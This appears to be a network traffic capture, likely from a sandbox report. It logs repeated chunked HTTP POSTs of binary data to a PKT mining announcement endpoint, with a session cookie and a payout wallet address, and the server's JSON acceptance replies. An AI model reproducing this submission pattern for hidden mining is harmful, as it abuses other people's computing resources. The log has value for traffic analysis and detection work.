Jan 7, 2025 14:01:27.516588926 CET	3708	OUT	Data Raw: 43 7b 76 5f 06 88 40 53 86 16 25 19 43 5d 19 3b d0 a9 dc 66 88 3f 3c 22 17 16 4f 44 6f 31 b0 3c 0f 74 bb b3 93 23 ce 02 89 e2 78 c4 b1 03 61 12 f4 5a 3d 1d 98 b6 99 92 a3 77 44 ac ca 4d a6 cd 47 33 d3 a9 e2 9c 32 6a d2 54 68 ef 7a cf 57 6a 33 e8 Data Ascii: C{v_@S%C];f?<"ODo1<t#xaZ=wDMG32jThzWj3%)%i;[Y'~d?E$K{*VDK8?0Et[Aw:I:&L{SQ'O(G/D28c1],/$+t"{<1SlO I554,ZvZ
Jan 7, 2025 14:01:27.516658068 CET	1236	OUT	Data Raw: 22 e8 16 18 96 90 25 5c a5 81 eb 56 6c 0a 28 79 f8 06 99 d2 bf 12 8b 21 9d 37 59 90 9e 94 60 96 09 a3 97 71 d7 a4 e9 ac 32 28 e5 33 c7 cb 1f 1c f4 bf 69 24 17 9e 28 de 85 8f 3c e1 44 a9 87 5b 83 4a ff 62 55 52 29 a3 50 03 f1 95 0b 28 21 43 dc 62 Data Ascii: "%\Vl(y!7Y`q2(3i$(<D[JbUR)P(!Cb}0.?0AAAJa(%x@@NTEp"IyDHa1GSHMzhufQ+oM_ j4`Z5[!X?Z;j
Jan 7, 2025 14:01:28.653160095 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:01:28 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 35 36 31 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 35 36 31 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 38 38 38 35 36 30 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 39 2d 35 38 35 34 39 37 36 42 37 30 34 38 31 42 44 43 33 32 37 37 46 41 36 46 39 37 31 45 44 37 45 32 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":561,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":561,"totalLen":0,"target":521618356,"time":1736254888560,"eventId":"cah-2837099-5854976B70481BDC3277FA6F971ED7E2"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 14:01:28.551297903 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837100 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 14:01:28.551354885 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 a9 b9 05 4f 7c 8c e1 b4 43 17 1f 6b 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400O\|CkJ+35^=~SG+Ls0jw9U8C mL\|LziVB0uL5Qun]SsMM5H,4Z"eFd_\|C)y_n
Jan 7, 2025 14:01:28.556287050 CET	2284	OUT	Data Raw: 78 ff 25 15 a7 ff 2c 3f d5 ed 2d 3a 55 fd c4 a1 b1 02 93 a9 99 d7 92 67 3c ba 11 dc d2 6b ef ef 0d 94 96 d8 7f b9 58 fe 3f 1d ac 41 d4 1e c6 b0 71 7f de 67 2f 93 c5 f7 10 87 74 a4 c0 84 a5 c0 d3 64 bb d0 d6 e7 98 0a 74 e7 a9 56 9b ed 90 26 da e3 Data Ascii: x%,?-:Ug<kX?Aqg/tdtV&Mcw]9v9b-Lps:l)]aN1mz)0qcyg:4inYs(I\|<*\|cf\(XX~c<b!400N\|CkJ+
Jan 7, 2025 14:01:29.103120089 CET	458	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:01:29 GMT Content-Type: application/json Content-Length: 294 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 31 33 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 31 33 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 38 38 39 30 32 34 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 39 2d 45 38 31 39 31 35 37 36 38 35 44 44 37 42 44 36 35 39 32 38 39 39 45 30 44 32 31 34 32 34 34 34 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":13,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":13,"totalLen":0,"target":521618356,"time":1736254889024,"eventId":"cah-2837099-E819157685DD7BD6592899E0D2142444"}}
Jan 7, 2025 14:01:58.568418980 CET	25956	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837101 accept: / host: any.ah.pkt.world transfer-encoding: chunked Data Raw: 34 30 30 0d 0a 01 e0 76 0b 4d 7c 8c e1 b4 43 17 1f 6c 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9a 3d ef d9 85 4b 63 37 8c cb 76 49 44 df d6 c1 ba ed 72 5b 32 60 30 af 7f 0e 6e e5 06 1b 2c cc 1c 25 ef 7c b9 4e f8 db c5 64 a4 78 19 31 62 40 d4 a5 5a 4b b8 80 c1 79 0a 92 62 d9 07 e5 3f e4 e3 c4 be 86 1a 4c c7 71 6e c0 94 49 eb c3 55 27 15 f9 a9 7d 0c dc 6e bb d7 33 a7 30 39 c5 52 89 c0 86 87 14 29 60 8f 73 7f 78 60 1d e5 84 50 3c e5 6b 87 ed ec cf b3 b0 3b cc d3 fd 72 72 fa 23 85 e6 50 2e 0a c0 74 41 43 3d b8 44 42 ed 47 1e ef 40 db 78 e8 1f 88 cd 04 b5 af aa db e5 8c 29 0d c4 54 77 d5 1a de 67 af f4 e8 cc 7e 28 c5 c9 7f bc 10 68 04 c8 51 c4 7a ef 11 e9 e1 a7 e2 8f 41 38 3f 8e 1f 70 c9 32 0d 39 38 cf ec fe ad 8b 21 21 18 51 85 54 ec d1 a6 5a 48 fd 40 22 30 43 af 94 99 97 71 9e 4d aa 0b b2 1f 9a e4 b6 b8 f0 5b 1c d2 95 a7 [TRUNCATED] Data Ascii: 400vM\|ClJ+=Kc7vIDr[2`0n,%\|Ndx1b@ZKyb?LqnIU'}n309R)`sx`P<k;rr#P.tAC=DBG@x)Twg~(hQzA8?p298!!QTZH@"0CqM["\|#k"#Gf\<(N1rOb\|N:p@whIFon?V3Xy=neKIW%8MQI"]-KiiNMDt{71SMsI `FZ(h6;~B-cuT}aGE#:#s//L!u45#c%<^8n-"=TR?k5-[t@{;.YjCS+$haoDi2e.vh'#f;:/lOaQONV%l5MH5M\cc'\|yiYI\vQlGaZs."v%?@#yM-_aCvoa-~`1._?>&:#kG[ZI/t#s5i//]27-lN-dC'Ce7DO^6Ny@I"S64D6,3B_Rxq!=q7VJ\&1zt [TRUNCATED]
Jan 7, 2025 14:01:58.573395967 CET	2472	OUT	Data Raw: ef eb 68 1a af 6b cb c3 ca 36 e5 9e d0 e9 c5 6f 2c 0b 0c 23 d6 3a 4c d8 ee da 95 ea e5 b6 52 5a ac fc 66 0c f3 af 28 f0 41 28 68 e3 37 1b e9 e3 d1 e7 d0 b8 cf 5b 80 37 46 1c 6c 34 e8 f2 3f fb d8 80 34 a1 0d 9e 52 ad 69 0c 9e c5 d4 c1 4b 01 fb f1 Data Ascii: hk6o,#:LRZf(A(h7[7Fl4?4RiKF9PjUd400:M\|ClJ+JvrP;&F*%ID+5l}7QK"7!wL
Jan 7, 2025 14:01:58.573438883 CET	9888	OUT	Data Raw: bc 45 b1 fb bc e8 62 15 d7 4b 7d 46 aa 69 0e 31 67 42 68 19 32 82 41 04 11 56 81 74 19 04 28 5d 9a f0 6c 7c fd e7 b8 67 2f 76 57 d8 9b 08 bf 0e fd 1e d3 27 70 2d d3 e2 f3 25 3b 5e e9 9d 42 66 f0 cb ef 4a 07 9f a5 ce fd 7c 82 f4 14 ca b2 da e0 b8 Data Ascii: EbK}Fi1gBh2AVt(]l\|g/vW'p-%;^BfJ\|L]8Qk`J\`\S4H/}SRk-Q8r{N>1\|_RcbMR>cB_]EZl7=e1zn'Ho4YHSvQWv^V(G%s
Jan 7, 2025 14:01:58.573474884 CET	2472	OUT	Data Raw: 17 91 bd 92 64 43 27 ce d7 43 15 65 d4 bb 37 b5 44 df 4f b6 1c 5e b1 36 8d e8 4e 9f 7f 79 fd 40 49 be 22 93 b7 53 36 d8 34 d6 44 36 2c 33 1f be 42 a9 14 eb d6 0d f7 5f 52 9e 98 b8 e9 aa 78 71 21 3d 15 c6 d0 f3 84 f8 f2 9f fc 75 41 95 ee e1 74 a9 Data Ascii: dC'Ce7DO^6Ny@I"S64D6,3B_Rxq!=uAtc*IY9;k,-400)QL\|ClJ+\x6d3\}=h4TiD!
Jan 7, 2025 14:01:58.573510885 CET	4944	OUT	Data Raw: f3 a2 a3 91 21 9a 7d aa 27 8d b2 78 7f bb f6 53 c0 65 33 d9 e7 10 b1 98 f7 03 f4 39 20 c4 93 73 fc f8 45 77 67 0b ab a6 d9 6e c4 e7 b7 a4 f5 8e 67 be 87 c6 2d 43 74 88 33 83 50 54 bc af f4 57 19 35 5e 08 54 f4 47 fc 65 ab c1 99 b8 08 e9 3d 54 e7 Data Ascii: !}'xSe39 sEwgng-Ct3PTW5^TGe=T!qFxk'9n?^k-*Iq${.h$aT^eVPy5VOg5ZPh`4T[m1<;:qbLmX;=m}9n
Jan 7, 2025 14:01:58.573551893 CET	2472	OUT	Data Raw: 00 00 ac 1c 79 08 5f 7b ee 63 31 78 9c 81 36 2c 86 cf 09 59 39 d3 19 e3 18 35 f1 11 ee d8 22 d7 35 22 72 c9 74 64 18 b2 d1 2d 1a 77 88 09 c7 cc 0c 69 7d 05 2b e5 f2 10 ee a5 c8 3b ff 04 ee 6e 3a 28 ae a9 11 2b ab af 77 52 db ab 33 59 dc 9b 07 7e Data Ascii: y_{c1x6,Y95"5"rtd-wi}+;n:(+wR3Y~gv$/Xb{=[o6TgOdRtEGN77-&HY=j_pV@1;lJ! _DcFoni2NG$6yM;[#V
Jan 7, 2025 14:01:58.573579073 CET	2472	OUT	Data Raw: 0d cd 0e f1 a0 df aa 33 a1 e6 af 34 4b 45 f7 c4 2e e5 60 d7 6b d0 ad 5e a7 37 d3 45 1e 66 c5 0f 3e 7c 32 ae ef 9c c2 86 1e bf f7 1f 31 b5 ed 51 c3 b0 75 d5 e9 79 26 e2 0e 53 46 23 c5 71 b7 d2 77 ec ff 9c 8c 1f 0c 7e 51 e9 c3 7d de 19 72 5f 2c 51 Data Ascii: 34KE.`k^7Ef>\|21Quy&SF#qw~Q}r_,QTlMxW'#]PeE3`BUXl^fQM1OdN)BW,5\|dPK1no^*5g,t%<2zBnwcY,rsK2]3M-[
Jan 7, 2025 14:01:58.573599100 CET	2472	OUT	Data Raw: 41 7e ff 78 29 92 a2 3f 60 5b fe 34 25 4b bd 92 64 43 27 ce d7 43 15 65 d4 bb 37 b5 44 df 4f b6 1c 5e b1 36 8d e8 4e 9f 7f 79 fd 40 49 be 22 93 b7 53 36 d8 34 d6 44 36 2c 33 1f be 42 a9 14 eb d6 0d f7 5f 52 9e 98 b8 e9 aa 78 71 21 3d b1 c7 6d 8f Data Ascii: A~x)?`[4%KdC'Ce7DO^6Ny@I"S64D6,3B_Rxq!=mI#u%Lq AQA6PT;K,r400L\|ClJ+ _fEsveB
Jan 7, 2025 14:01:58.573677063 CET	2472	OUT	Data Raw: da 59 0a 00 94 e7 85 db 66 6a e4 5e 72 04 f3 c5 72 74 75 30 3c c8 3c 8b 6c 8a f9 73 65 69 d7 ae 61 f5 c4 5b e0 36 2d 64 23 cf 26 35 79 a0 9f 37 83 66 6b 39 df 48 79 51 d3 a7 d3 ff 2e aa 5d dd 4d 6d eb 8b 1a c2 1b 9a f2 7c d9 87 63 72 6b 6f 28 e2 Data Ascii: Yfj^rrtu0<<lseia[6-d#&5y7fk9HyQ.]Mm\|crko(h~b~%fIP,mjX38`U&=v+8-$'x%3<o 02nF DZ)/$%I%,^nyG'cr.m
Jan 7, 2025 14:01:59.148794889 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:01:59 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 34 30 32 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 34 30 32 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 39 31 39 30 35 35 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 31 30 30 2d 31 32 38 41 32 43 32 32 39 43 31 38 39 34 42 34 34 45 44 46 45 34 34 32 30 45 33 30 34 32 43 32 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":402,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":402,"totalLen":0,"target":521618356,"time":1736254919055,"eventId":"cah-2837100-128A2C229C1894B44EDFE4420E3042C2"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 14:01:38.494456053 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837101 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 14:01:38.494561911 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 b0 0f 00 4d 7c 8c e1 b4 43 17 1f 6c 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400M\|ClJ+iJu4Fe&(1^B($\|afcR;8qupv:D g<ElQ$.o'=EXEc={c
Jan 7, 2025 14:01:38.499422073 CET	1236	OUT	Data Raw: 4f bd c4 84 8c ff 9e bc 14 3e 77 1b 84 d8 18 40 a7 47 69 b6 a3 32 c0 a8 ca 8d c8 cc c8 32 32 a9 b6 ae 0f c4 7f da 49 18 72 19 a2 d7 89 a5 c3 24 44 ad 24 9c bd 30 41 a8 3f fd c7 4c da cd 84 fd 9b ec 64 4e fe 53 d2 c4 7f 26 0d f6 71 cc bc 49 82 11 Data Ascii: O>w@Gi222Ir$D$0A?LdNS&qI-hZ{R399Chk6o,#:LRZf(A(h7[Z)*F (qv:H3O400Z3N\|ClJ+
Jan 7, 2025 14:01:38.499505997 CET	4944	OUT	Data Raw: 56 0e 2f 23 02 95 b9 ed 55 e6 0d 0a 34 30 30 0d 0a 01 01 67 00 4d 7c 8c e1 b4 43 17 1f 6c 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: V/#U400gM\|ClJ+@,/&k*5s>gO]:;Ypd.\>Mo\,fMy 2YYg9Q{BL4Y&84&,#fk5-`;
Jan 7, 2025 14:01:38.499527931 CET	4944	OUT	Data Raw: dd c1 4a 04 2c 2b 53 07 7c a1 41 e1 8e 6b 29 8d 84 e4 f6 9f 98 ef 3e a9 03 e2 8a 1b 3b 36 c9 01 74 35 0d 1e 7e f6 58 b6 fd 62 32 ef d7 26 79 ac e1 23 5b 16 70 71 9b 1b a8 5f 11 28 db 3e 2b 30 5f 59 bb 1e 5f bc d2 cb 48 e8 65 85 71 1b cc e0 21 1d Data Ascii: J,+S\|Ak)>;6t5~Xb2&y#[pq_(>+0_Y_Heq!/'*B\|oF0@2IChk6o,#:LRZf(A(h7[17?'FRD[M-IN}Mr313400IN\|ClJ+
Jan 7, 2025 14:01:38.499582052 CET	4944	OUT	Data Raw: 75 f6 33 35 6d 71 91 49 1e d4 10 3c 37 7f 82 28 f6 a3 61 7d 3e 2e bb 57 3d 97 f2 90 90 6e ed f6 c9 55 6d a5 57 2d 69 fc d4 4c ab 06 91 6a 5d a3 b9 06 64 2b 54 c5 d1 1c 29 2c 60 5f a3 6a ea dd b2 8d 29 ce 29 53 dc f4 b5 87 4f a1 a1 e7 24 fc c1 a8 Data Ascii: u35mqI<7(a}>.W=nUmW-iLj]d+T),`_j))SO$AVS8*=a"(DOjWm%6wBvN#@2 ;.d~$0\|0pB6lJodf}bwW9)9uk1W5Z&/y0H2"]!P(0!6rq
Jan 7, 2025 14:01:38.499598980 CET	2472	OUT	Data Raw: a0 13 88 d2 16 03 b8 74 3f 75 30 73 9a 87 2b 75 49 24 20 c6 ea cc 6f 81 98 e8 81 72 55 99 16 33 86 1e e5 79 2c a4 5a 03 74 69 c1 bd 1b 0f 0d 97 b7 c3 43 95 a0 08 9f 48 5f 32 89 c6 53 31 62 04 be 93 4d 9b 69 1f 41 48 47 43 4a 43 ed 13 0d 2a 7f 6d Data Ascii: t?u0s+uI$ orU3y,ZtiCH_2S1bMiAHGCJC*m?qv9?"^\qjnJr/'i6b ccwes5J!5:1xYv\|KQ:yRBH[_Q&nbBloPZ:zq;+
Jan 7, 2025 14:01:38.504110098 CET	4944	OUT	Data Raw: d7 9e 6d a2 9c 1f 05 18 d5 f2 76 98 fd 82 0f b6 68 8e 68 be 70 e9 0e 7a 5a d2 80 8f ac 92 2b e2 da f7 7e a8 3e 61 8d 8e ea 8e dc 29 d7 cc ec 4c 7c 46 17 37 26 e6 43 0f e6 cf d7 a4 bf d1 4b 78 44 e9 88 48 63 f6 07 db ed 2d 96 81 47 0f 2a b4 96 6a Data Ascii: mvhhpzZ+~>a)L\|F7&CKxDHc-G*j,~5s_P=pr]B6'qnA/dC'Ce7DO^6Ny@I"S64D6,3B_Rxq!=]x\|`I'3QX0f8+G/400
Jan 7, 2025 14:01:38.504261017 CET	2472	OUT	Data Raw: 4b aa 5c 1e e9 58 3c 96 a0 36 41 e7 e2 4e 9e 17 ef 23 9b 60 8e 7a db c7 92 75 66 54 59 6e 67 fe 10 61 ca f1 89 85 cd 1a b3 35 5f 35 91 2d 0c bb 80 55 62 c2 bd d6 58 0e 74 0a 61 3a 58 0d 6b 5b e6 9c 5c f3 f5 50 bf 39 8b 92 41 0e 03 e5 2f b7 bd 65 Data Ascii: K\X<6AN#`zufTYnga5_5-UbXta:Xk[\P9A/eJvl\kT)Xe8(L[(Oz0A?[/(Hd@WKN?>{E+g(^J&Lr*f"V-F/(&3%(v
Jan 7, 2025 14:01:38.504528999 CET	9888	OUT	Data Raw: 4c 34 27 ee 5d d9 d1 bd 1b 51 0d e5 f3 d0 41 fa 98 79 23 b9 78 19 52 88 fb 39 d9 df fa 95 c9 07 95 ee 0d 0a 34 30 30 0d 0a 01 5d 8f 00 4e 7c 8c e1 b4 43 17 1f 6c 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: L4']QAy#xR9400]N\|ClJ+WAk\PqIt2PQFPEK}eM57kjEECsy= R<4#nY+Wbn3J
Jan 7, 2025 14:01:38.504556894 CET	2472	OUT	Data Raw: e3 ff e4 e9 99 3c 26 bd d7 dc 37 62 ca 64 0c 92 a4 04 04 99 71 b7 4d 01 2b 81 b8 c4 05 34 ea 82 61 44 22 e0 b7 76 01 4f 70 5d 71 a0 e2 01 42 40 2f ce b1 49 50 78 11 ba c7 4c 69 d3 d5 68 a0 6e 57 af 2d 51 60 28 97 81 fc ae 16 4e e2 ae 99 99 0e e8 Data Ascii: <&7bdqM+4aD"vOp]qB@/IPxLihnW-Q`(NdbC$G1]0~"h%bT'+%waaf/qfZ%diSY,{<;auZ.O9Vs=T+0R
Jan 7, 2025 14:01:39.613908052 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:01:39 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 35 35 31 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 35 35 31 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 38 39 39 35 30 39 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 31 30 30 2d 46 39 33 43 43 32 38 34 36 43 36 44 37 46 34 36 36 37 46 32 42 44 45 37 34 32 35 45 32 41 32 43 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":551,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":551,"totalLen":0,"target":521618356,"time":1736254899509,"eventId":"cah-2837100-F93CC2846C6D7F4667F2BDE7425E2A2C"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 14:01:48.891905069 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837101 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 14:01:48.891905069 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 76 b4 05 4c 7c 8c e1 b4 43 17 1f 6c 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400vL\|ClJ+l~`t_8=HtQe@\|\|&Io~bu^cCs23<?yO^IN_@7!DB,nGVz*lnr3e-uc7@8{
Jan 7, 2025 14:01:48.897056103 CET	8652	OUT	Data Raw: a3 e5 63 a3 d4 ce c0 79 04 7c 78 9a 99 35 66 50 a0 81 eb f9 ee c1 ec 31 8f be fc c0 c3 3e ef 85 a6 b6 e4 0a 69 7c 64 0d 37 0f ef 66 1b 7a 1c 2c 47 03 df c1 43 6c f4 a9 eb 44 5e 1b 95 c0 53 c6 0d 2b 93 70 f5 65 a0 7a 37 07 a3 84 41 f2 bb ab bf 74 Data Ascii: cy\|x5fP1>i\|d7fz,GClD^S+pez7AtX=7`/@>sdC'Ce7DO^6Ny@I"S64D6,3B_Rxq!=9@HnN\J&q<{L#400;xN\|ClJ+
Jan 7, 2025 14:01:48.897116899 CET	14832	OUT	Data Raw: 4e 44 d3 4e fd 87 84 85 aa 48 26 0f 68 85 4c b6 f6 05 a7 2e f3 c5 f1 d2 f6 32 e5 53 b7 9f 8c 0f 90 76 76 be a5 9e 0c e6 51 f9 ad ed 55 b2 21 84 77 4d b1 9c 57 af 10 b5 d4 38 8f a2 b9 fb 75 03 95 bf 31 62 d5 fc b4 8c 93 91 81 9d 81 f3 e0 ce af 08 Data Ascii: NDNH&hL.2SvvQU!wMW8u1bqfVJL>pu)#R>E85I49j7(R0O\|[A#6nU<=-64,/Z4*)&y&ze}.-nRyK,(K@
Jan 7, 2025 14:01:48.901962996 CET	2472	OUT	Data Raw: 2e cf 42 5c 87 6c 19 c2 f0 d9 3c 9c 47 fb f5 98 62 9c c4 e6 f7 0c 71 64 f8 82 40 58 97 a4 90 a3 54 69 4a 83 23 21 e7 ff 26 3a c7 c1 59 0b 1a 7a 77 b8 7f 51 80 c0 07 57 14 4d 76 af 5c 09 f4 ad 36 ca b8 12 34 ee f0 e6 d1 a0 ea 55 75 d7 2e 62 be 77 Data Ascii: .B\l<Gbqd@XTiJ#!&:YzwQWMv\64Uu.bw5X-eCrq&[hi<12*</82}V(K[D-IexqXHp~~JSqPR`>$.}y<`Ez[i6GLG\b3v6)#!OJo
Jan 7, 2025 14:01:48.901993990 CET	1236	OUT	Data Raw: fd c9 51 40 8e ee 2e f1 10 63 2d 52 71 20 06 e6 2f a2 c9 e3 bf ac 97 11 0f fd 94 b9 0c 2b 0a b8 10 01 0d 0a 34 30 30 0d 0a 01 49 e4 05 4d 7c 8c e1 b4 43 17 1f 6c 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Q@.c-Rq /+400IM\|ClJ+w/:rK+1d>^OjL[D*_z!}q:DFfI+ih%(sQjU4Yj&_
Jan 7, 2025 14:01:48.902004004 CET	3708	OUT	Data Raw: 12 9d 62 39 da f2 ba 94 7e 82 59 ab 6f 6b 6a bd b4 92 8a 84 e5 24 f9 ab a9 78 6f 87 74 11 da e7 81 a2 16 12 b7 88 30 2a 3a 08 90 a8 17 c5 9e 84 70 23 d9 ec 9a 1a 10 71 57 aa 82 c0 9c 50 d9 20 b4 f6 b8 8e 2b 87 ad de d6 28 b9 b5 72 95 f2 14 3b a0 Data Ascii: b9~Yokj$xot0:p#qWP +(r;Q1_UCC!#2jw,:mL :tK0/V4sF&Bo@,/\l@XN3q"$`Tv+Is"y^{8).Y86
